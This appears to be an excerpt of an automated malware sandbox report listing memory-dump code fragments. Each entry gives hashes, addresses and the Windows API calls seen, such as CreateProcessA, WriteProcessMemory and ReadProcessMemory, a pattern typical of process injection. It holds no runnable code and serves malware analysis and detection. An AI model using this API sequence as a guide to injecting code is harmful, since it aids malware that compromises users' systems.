                                                              • Instruction Fuzzy Hash: CC513230613256CFCB0AFB7EF8C09943B62B7992057049B75D2044BA6EE7713966CB91
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e4f1c6a25f8ca9d43298e179b5ab991c6d175a9f37850ecd7a7d66d139e2e282
                                                              • Instruction ID: 405cd5dbfb15a20becc6622461e082ab2abb3bc93e0b400c58c9c99acbdd4964
                                                              • Opcode Fuzzy Hash: e4f1c6a25f8ca9d43298e179b5ab991c6d175a9f37850ecd7a7d66d139e2e282
                                                              • Instruction Fuzzy Hash: CB511130613256CFCB0AFB7EF8C09943B72B7992057049B75D2044BA6EEB713966CB91
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ee6875b905d714d805ce011230df66d110db4b447a7be2c0180cde32e4b2e6e6
                                                              • Instruction ID: 6b7b6ea890394b9bec8316166c7611353934d30c313b6b1561c30d89d6b63c84
                                                              • Opcode Fuzzy Hash: ee6875b905d714d805ce011230df66d110db4b447a7be2c0180cde32e4b2e6e6
                                                              • Instruction Fuzzy Hash: 10316075B00616EFD705DF68D890E3AB76ABFC4600F54C158E5419B299CB32EC42CB90
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 51ea0b2ade0a3cc19c006dba442b502a5b29e3dfa32c1adf246efea14d6b5ae5
                                                              • Instruction ID: cd98ca051b1fa801c18a1797589531f6603f07071339819883595d9565cc0b74
                                                              • Opcode Fuzzy Hash: 51ea0b2ade0a3cc19c006dba442b502a5b29e3dfa32c1adf246efea14d6b5ae5
                                                              • Instruction Fuzzy Hash: 77318431E2020ACFDB25DF69E8507AEB7B6FF85314F204929E505EB280DB71AD85CB40
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c60b7e19693c1ab3bb3173afc5947ae770fc8e5f7a6dea4d860d42fdf0c5ff48
                                                              • Instruction ID: 12bfe008f9dd67c6ffbb9b3b03e8013e6140075403acd833c1ab6b8d16f82318
                                                              • Opcode Fuzzy Hash: c60b7e19693c1ab3bb3173afc5947ae770fc8e5f7a6dea4d860d42fdf0c5ff48
                                                              • Instruction Fuzzy Hash: 1B41EEB4D10349DFEB14DFA9C884ADEBBF5FF48310F148029E819AB250DB759985CB91
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 084a999e30b1075c0be8f73bbd3a9a9357257f0ce9ab9c851ee1e06899a16088
                                                              • Instruction ID: ab6e3f68be4c7205e2e7f1f6171124c5c9c7bb739dab4a59fc8f1461c4336741
                                                              • Opcode Fuzzy Hash: 084a999e30b1075c0be8f73bbd3a9a9357257f0ce9ab9c851ee1e06899a16088
                                                              • Instruction Fuzzy Hash: 01316131E2020ACBDB25CF79D8907AEB7B6EF95314F204529E505EB281DBB59886CB40
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea79b1fcde5d26a4fc3705c4d87751f3d02aec34aa7322ca58af0027e1467b9a
                                                              • Instruction ID: ee052c6d00af78f44e6b28b3ceefd2ef309e7debb0e650182c953e91656a8321
                                                              • Opcode Fuzzy Hash: ea79b1fcde5d26a4fc3705c4d87751f3d02aec34aa7322ca58af0027e1467b9a
                                                              • Instruction Fuzzy Hash: 89316030711216CFDB15EF38C9506AD77F6AF89240F1005A8DA01AB3D4DB36DC91CB91
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: db4782c7b976346fc84782e6c2fbbb4e74cfef494f5b5d7e0cf8e1a42cbf64d9
                                                              • Instruction ID: 752755fc74884e7bc9d18197134ae7db5fe3e811d3ebba6c8b42e4e360dbbfaa
                                                              • Opcode Fuzzy Hash: db4782c7b976346fc84782e6c2fbbb4e74cfef494f5b5d7e0cf8e1a42cbf64d9
                                                              • Instruction Fuzzy Hash: 2741E170D10349DFEB14DFA9C884ADEBBF9FF48310F148029E409AB250DB75A945CB91
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33fcab019388db8e47a036e920b49d9138253eeab0d38b25cf5dc0537d11b0ea
                                                              • Instruction ID: 98030f86d68910aa987e19b822b9de4d502edcaf5419031b11f87d3750ee7475
                                                              • Opcode Fuzzy Hash: 33fcab019388db8e47a036e920b49d9138253eeab0d38b25cf5dc0537d11b0ea
                                                              • Instruction Fuzzy Hash: 9D317234710226CFDB14EB78D5506AD77FAAF88240F1005A8D601AB3D4DB36DC81CB91
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 99f0974531814efffac5b76032886989f1b3b9a672b95496706e06e33c1087e4
                                                              • Instruction ID: 11624eb330109e6973a12edb139fed003c0d6d5f86256555728ece8432efc3a1
                                                              • Opcode Fuzzy Hash: 99f0974531814efffac5b76032886989f1b3b9a672b95496706e06e33c1087e4
                                                              • Instruction Fuzzy Hash: 75318174E1024ACBDB15CFA8D99179EFBB2BF89300F108659E905FB281DB759985CB80
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7b1406a194224acf64e99596211f3f21905162a40f8624dac267fb65c27ed84
                                                              • Instruction ID: a52be74b6e22f787b6cd4342c1edba41296af455728bf76a5e4668349e5da1e0
                                                              • Opcode Fuzzy Hash: d7b1406a194224acf64e99596211f3f21905162a40f8624dac267fb65c27ed84
                                                              • Instruction Fuzzy Hash: 7B216274E1020ADBDB15CFA9D89069EF7B6FF89340F108659E905FB281DB719885CB90
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 580d17ea47b695b2b1417e7fded7f44b9a747d88a3bfdf729e68bf2e7e04474c
                                                              • Instruction ID: a86288edca3839f8fa5e9ff992a27be1abdc354e1f2ffd7d2747a6e33e36a9f7
                                                              • Opcode Fuzzy Hash: 580d17ea47b695b2b1417e7fded7f44b9a747d88a3bfdf729e68bf2e7e04474c
                                                              • Instruction Fuzzy Hash: 94218338A111128FDF17BB7DF884759335AE785204F104B71D105C729AEB29A8A1CB92
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 59ac4c35d6d3284fc2bf957eadbd1a0e30acc0a046da728ba25aa7a01f1a73bf
                                                              • Instruction ID: dd9b9eab34841142bd0f93f429afb43de4648992bc55c354b0486b81f8d16f2a
                                                              • Opcode Fuzzy Hash: 59ac4c35d6d3284fc2bf957eadbd1a0e30acc0a046da728ba25aa7a01f1a73bf
                                                              • Instruction Fuzzy Hash: 1C21C130E1020ACBCB19CF68D8906DEF7B6EF89310F10852AE815FB381DB70A885CB51
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f66f66bb1b8198332dfaba480ccefe7a13aacb7de1ddd5573e638584a35e3b47
                                                              • Instruction ID: 14161628009a75e2ed9efc20c56e5366a6db05541c96ee457d4e4e103ba55266
                                                              • Opcode Fuzzy Hash: f66f66bb1b8198332dfaba480ccefe7a13aacb7de1ddd5573e638584a35e3b47
                                                              • Instruction Fuzzy Hash: AE210830A102528BEB37172CE4843683729E782311F014A2AE607CB7C5D624E8F58752
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64eb23ba41ce973afa9e267970860b75a5712f2bba88bd4d965d6f93d4c2094a
                                                              • Instruction ID: 31c342f38cf0f4457bff978faa424a1b3f150248301406866399c85834ab78db
                                                              • Opcode Fuzzy Hash: 64eb23ba41ce973afa9e267970860b75a5712f2bba88bd4d965d6f93d4c2094a
                                                              • Instruction Fuzzy Hash: 03219875B201058FEB14DB69C954BAD7BF9AF88710F218129E505FB3E0DA71CD40C790
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2bdafc4980dc4df1a1547c99da9d47d7443ad1f2d37e8f96789a31bc3cb64d1d
                                                              • Instruction ID: 471222cfa042d533ae37852480e5fe9b6d4c2422f7718bb304c53a3740ef956a
                                                              • Opcode Fuzzy Hash: 2bdafc4980dc4df1a1547c99da9d47d7443ad1f2d37e8f96789a31bc3cb64d1d
                                                              • Instruction Fuzzy Hash: BD218130B11216CFDF24DB78C5147AD77F6AF89300F200468C605EB290DB36ADA1CB91
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ef786549c5bb757bac351b5f0e1a2b01735096de667a4d1b8c55d7e046a1506
                                                              • Instruction ID: 8f6eb590bd8188790ce4729be4a7f86f67dcbf82d33b6ede5bcb6c9e8106a8a1
                                                              • Opcode Fuzzy Hash: 7ef786549c5bb757bac351b5f0e1a2b01735096de667a4d1b8c55d7e046a1506
                                                              • Instruction Fuzzy Hash: D521B075F202058FEB14CB68C955BAE77F9AF88710F258029E505FB3A0DA71CD408B90
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 74d2ae10c145a84d6b3482fd2e386c043ba73b4d5590c2feb5220d38e6638150
                                                              • Instruction ID: 485044ccb102976b8eb6ccb1d42b7599df4547e883a4f97c0eb1187ddd952dbd
                                                              • Opcode Fuzzy Hash: 74d2ae10c145a84d6b3482fd2e386c043ba73b4d5590c2feb5220d38e6638150
                                                              • Instruction Fuzzy Hash: C9213D34B10215CFCB54EB78D658AADB7F5EF8D244B104468E506EB3A4DB31ED80CB91
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3943394583.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_110d000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea96264e6dae1a27029a9e4d6cd5b4653a9902fa7d6c32d08cecc1c35089d474
                                                              • Instruction ID: 41f22b58d81638dcb51b3050eb1987441dedf85cf8d39c2f44d68d3a170afb6b
                                                              • Opcode Fuzzy Hash: ea96264e6dae1a27029a9e4d6cd5b4653a9902fa7d6c32d08cecc1c35089d474
                                                              • Instruction Fuzzy Hash: A9212571A04304DFDF1ADF94E980B26BB61FB84314F24C56DE80D0B29AC3B6D447CA62
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d894d021ec603c36a3d9beb2e97e062e34d44a25c8543f2f4302433c92872b1
                                                              • Instruction ID: 6d0620417d5163a617d793efc890fdc396230573a5fcf4c969a69630d4e9629f
                                                              • Opcode Fuzzy Hash: 0d894d021ec603c36a3d9beb2e97e062e34d44a25c8543f2f4302433c92872b1
                                                              • Instruction Fuzzy Hash: CC213130B11216CFDF24EB78C5147AD77FAAF89241F100468D605EB294DB36AD90CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e46ee4e592683a0f4f4df417680556f40bfd00d28d661c8bb1a8036e6060e73a
                                                              • Instruction ID: b04212ad2ee2cd9e34ca3459b98d226a7f2d3f5c1ce41814c6cd0ed7d37ea7f7
                                                              • Opcode Fuzzy Hash: e46ee4e592683a0f4f4df417680556f40bfd00d28d661c8bb1a8036e6060e73a
                                                              • Instruction Fuzzy Hash: 52216230E1020ADFCB19CF68D49069EF7B6AF89314F50851AE915FB381DB71A885CB50
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1679e7c6d5119659f7d04d980519991b08cf1e32ab2869ad58972cb4c99c0aab
                                                              • Instruction ID: 02114d5da19313afea95c8edfd5a6bb82d0296ca7a14bebd4b40b1edfad8a8f3
                                                              • Opcode Fuzzy Hash: 1679e7c6d5119659f7d04d980519991b08cf1e32ab2869ad58972cb4c99c0aab
                                                              • Instruction Fuzzy Hash: B12142386111168BDF17E77DF884759335AF785604F104B31D105CB29AEB29ACA1CB92
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33f14389d36fbf37b08152c6fb6a36bd03b16d435338cb00b3ccc584cf498d40
                                                              • Instruction ID: d081d2df733c8e5df42df341e5694cd53e818093523435e44b3d3bb9ca268d65
                                                              • Opcode Fuzzy Hash: 33f14389d36fbf37b08152c6fb6a36bd03b16d435338cb00b3ccc584cf498d40
                                                              • Instruction Fuzzy Hash: 64112C76F012569FCB116F7568442AF7FF9EB45210B104625E941D7344EB399962CBC0
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 462d2469090bdfe2dbdb8d125283b000c4fd1b5335a33fc278c23edfb9c5f604
                                                              • Instruction ID: 906acec9509139218c8cdc8044a625e3b69c1505fbdd129e56693760a7234bc9
                                                              • Opcode Fuzzy Hash: 462d2469090bdfe2dbdb8d125283b000c4fd1b5335a33fc278c23edfb9c5f604
                                                              • Instruction Fuzzy Hash: FF212A34B10215CFDB18EB78D658AADB7F5AF8D240F100468E506EB3A4DB31ED80CB90
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3944140997.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_1260000_jKqPSehspS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a721ca1448da3980e88c45949eb40e6910fcc109d7774d36f07419d941d65c93
                                                              • Instruction ID: 6b8f2a5b70ee468d99e80719fb63d874a56d9417754152df2351712eb325e189
                                                              • Opcode Fuzzy Hash: a721ca1448da3980e88c45949eb40e6910fcc109d7774d36f07419d941d65c93
                                                              • Instruction Fuzzy Hash: 141138317182058FC31A5B78849026E7FAAFFC5210F1484AFC106DB285EA398846C752
                                                              Memory Dump Source

                                                              Execution Graph

                                                              Execution Coverage:11.2%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:213
                                                              Total number of Limit Nodes:16

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 00D0D3D6
                                                              • GetCurrentThread.KERNEL32 ref: 00D0D413
                                                              • GetCurrentProcess.KERNEL32 ref: 00D0D450
                                                              • GetCurrentThreadId.KERNEL32 ref: 00D0D4A9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 00D0D3D6
                                                              • GetCurrentThread.KERNEL32 ref: 00D0D413
                                                              • GetCurrentProcess.KERNEL32 ref: 00D0D450
                                                              • GetCurrentThreadId.KERNEL32 ref: 00D0D4A9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FF72A6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FF72A6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0

                                                              Control-flow Graph (image not reproduced): single basic block d05a64-d05af4, no API calls shown
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8707a84cbd063e4b630b173213ec370ecd5459e2d745827a134b811170d7554
                                                              • Instruction ID: e114340c3328bf3eebe623b6f44919e12da94f85d93db30e29e867f6336a05d3
                                                              • Opcode Fuzzy Hash: d8707a84cbd063e4b630b173213ec370ecd5459e2d745827a134b811170d7554
                                                              • Instruction Fuzzy Hash: 2B410471905B48CFEB11CFA8E8447EFBBB1AF56314F14418AC489AF299C7356906CF21

                                                              Control-flow Graph (image not reproduced): function d044b4-d05a41, calls CreateActCtxA
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00D059A9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: a9833f1afb04beb3d883520b2feb55579602a7c5979a65b92cb0d331d5270a85
                                                              • Instruction ID: af03168ec52409095d3ac6c2be3f44096268889e0e0cbf85a476ca49bf0bea70
                                                              • Opcode Fuzzy Hash: a9833f1afb04beb3d883520b2feb55579602a7c5979a65b92cb0d331d5270a85
                                                              • Instruction Fuzzy Hash: CC41E3B0D00719CFEB24DFA9C844BDEBBB6BF49304F20816AD408AB255DB756945CFA0

                                                              Control-flow Graph (image not reproduced): function d058ed-d05a41, calls CreateActCtxA
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 00D059A9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1573193825.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_d00000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: e81fa005755c79536b45333d47ebf450c9ec6914d5496b5eb747172a73a4a711
                                                              • Instruction ID: 6a87d5f535b1a20378c50c9ed787ff71388228ca67749825a09a02d9b31ca115
                                                              • Opcode Fuzzy Hash: e81fa005755c79536b45333d47ebf450c9ec6914d5496b5eb747172a73a4a711
                                                              • Instruction Fuzzy Hash: BA41E370D00719CFEB24DFA9C8447CEBBB5BF49304F24816AD408AB295DB756945CF61

                                                              Control-flow Graph (image not reproduced): function 59527c0-59528b2, internal calls to 595211c and 5951e78, calls CreateIconFromResourceEx
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1586739897.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_5950000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: CreateFromIconResource
                                                              • String ID:
                                                              • API String ID: 3668623891-0
                                                              • Opcode ID: d31c8718d0ba286b8b67613d84d74f8cebaf973be8f2ec59220a4a95ca9cfb6b
                                                              • Instruction ID: ab3bb88232f1d7d54e94314f9a30987cc913e31f4e454aef7c5bffcd413846ee
                                                              • Opcode Fuzzy Hash: d31c8718d0ba286b8b67613d84d74f8cebaf973be8f2ec59220a4a95ca9cfb6b
                                                              • Instruction Fuzzy Hash: E1318D76904359DFCB11CFA9C844ADEBFF8EF49320F14805AEA54A7211C339A854DFA1

                                                              Control-flow Graph (image not reproduced): function 6ff6de0-6ff6ebe, calls WriteProcessMemory
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FF6E78
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 4eabff9a49cd7773534b522640ff30a01644849806b268281bf40ad2b5300308
                                                              • Instruction ID: e84279093d42e8035695bba7da59e21d712d13861c07fa56d4986dae44a3c141
                                                              • Opcode Fuzzy Hash: 4eabff9a49cd7773534b522640ff30a01644849806b268281bf40ad2b5300308
                                                              • Instruction Fuzzy Hash: D8212476900309DFDB10CFAAC881BDEBBF5FF48310F148429E958A7250CB789945CBA5

                                                              Control-flow Graph (image not reproduced): function 6ff6de8-6ff6ebe, calls WriteProcessMemory
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FF6E78
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 2be45e1b4377796141303b7d4ea3cedb1f72a6f02e51c4728103dc56cc199d16
                                                              • Instruction ID: f852242f86b26468ea7e19e440e6bd586e3233ea9cd28ee7717de85da338153e
                                                              • Opcode Fuzzy Hash: 2be45e1b4377796141303b7d4ea3cedb1f72a6f02e51c4728103dc56cc199d16
                                                              • Instruction Fuzzy Hash: 2D212472900349DFDB10CFAAC885BDEBBF5FF48310F14842AEA58A7250C7789951CBA5

                                                              Control-flow Graph (image not reproduced): function 6ff6ed0-6ff6f9e, calls ReadProcessMemory
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FF6F58
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1587241808.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_6ff0000_BLpvFR.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 25c6eb74d411c026550829d9c127749434082406baef08c1a8904dc3db76ccbb
                                                              • Instruction ID: a56dc20533e4b3d31e02d0205f2c33e9a355c7021931e37f109fb6cfc5279823
